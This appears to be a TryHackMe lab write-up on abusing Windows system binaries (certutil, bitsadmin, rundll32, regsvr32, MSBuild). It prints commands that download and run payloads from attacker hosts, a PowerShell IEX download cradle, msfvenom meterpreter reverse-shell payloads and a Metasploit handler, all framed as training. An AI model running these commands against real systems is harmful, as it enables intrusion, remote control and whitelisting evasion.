CTF Writeup: LOLBAS

TryHackMe | Cyber Security Training

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

tryhackme.com

LOLBAS

contribution guide. Ourcriteria list sets out what we define as a LOLBin/Script/Lib. MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on theATT&CK® Navigator. If you are looking for UNIX binaries, please visitgtfobins.github.io.

lolbas-project.github.io

WIndows version of GTFObins

#1: Certutil

certutil

Certutil.exe is a command-line program, installed as part of Certificate Services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains. If certutil is run on a certification authority without additional parameters, it displays the current certification authority configuration.

docs.microsoft.com

https://attack.mitre.org/techniques/T1105/

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.

attack.mitre.org

# Download from remote:
certutil -URLcache -split -f http://10.0.0.13/payload.exe C:\Windows\Temp\payload.exe
# Another command for encoding payloads locally:
certutil -encode payload.exe Encoded-payload.txt

#2: BITSadmin

Download, execute, copy, ADS

bitsadmin

Reference article for the bitsadmin command, which is a command-line tool used to create, download, or upload jobs and monitor their progress.

docs.microsoft.com

bitsadmin | LOLBAS

Used for managing background intelligent transfer

lolbas-project.github.io

https://attack.mitre.org/techniques/T1197/

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications.

attack.mitre.org


bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe

#3: Findstr

findstr

Searches for patterns of text in files. findstr [/b] [/e] [/l | /r] [/s] [/i] [/x] [/v] [/n] [/m] [/o] [/p] [/f: ] [/c: ] [/g: ] [/d: ] [/a: ] [/off[line]] [ :][ ] [ ...] /b Matches the text pattern if it is at the beginning of a line.

docs.microsoft.com

findstr | LOLBAS

lolbas-project.github.io

# Download from SMB SHared folders on the same Network
findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe

File Execution

Signed Binary Proxy Execution or Indirect Command Execution: Leveraging other programs to execute malicious programs.

Indirect Command Execution

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. [1] [2]

Adversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.

Signed Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.

executing a binary within the operating system. The typical case of executing a binary involves various known methods such as using the command line cmd.exe or from the desktop. However, other ways exist to achieve payload execution by abusing other system binaries, of which one of the reasons is to hide or harden the payload's process.

#1.- File Explorer

explorer.exe /root,"C:\Windows\System32\calc.exe"
# Without /root, the second executable will be ran directly (Maybe /root runs it on the BG?)

#2.- WMIC (Windows management instrumentation) T1218

# Can be C:\\path\executable.exe
wmic.exe process call create calc

#3.- RunDLL32 T1218

arbitrary payloads and execute JavaScript and PowerShell scripts

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
# 
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<remote-ip>/exe.ps1');"

Bypassing Application Whitelisting

#1.- Regsvr32

Microsoft command-line tool to register and unregister Dynamic Link Libraries (DLLs) in the Windows Registry. - According to MITRE, it’s the third most popular technique (Signed Binary Proxy Execution - T1218.010)

# Step 1: Download remote DLL
# Step 2: Execute DLL with regsvr32.exe path:\\my.dll
regsvr32.exe /s /n /u /i:http://10.0.0.13/my.dll Desktop\rev.dll

EXERCISE

# msfvenom reminder:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f dll -a x86 > rev.dll

#2.- BASH (WSL) - Indirect Command Execution T1202

Since WSL is a signed program, it can be used for Indirect Command Execution, to run any arbitrary (Unsigned) command, without necessarily invoking PS or CMD.

Initial access & Persistence

#1.- T1547: Shortcut modification technique, or SymLinks

Trojanized targets for programs

#2.- Powershell-less execution

EXERCISE:

Using PowerLessShell to be leveraged by MSBuild.exe, without running PS:

# 1.- Generate Ps1 Payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1

#2.- Use MSFC
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost AttackBox_IP;set lport 4443;exploit"

#3.- Use PowerLessShell.py to 
python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj

#4.- Use MSBuild to execute the .csproj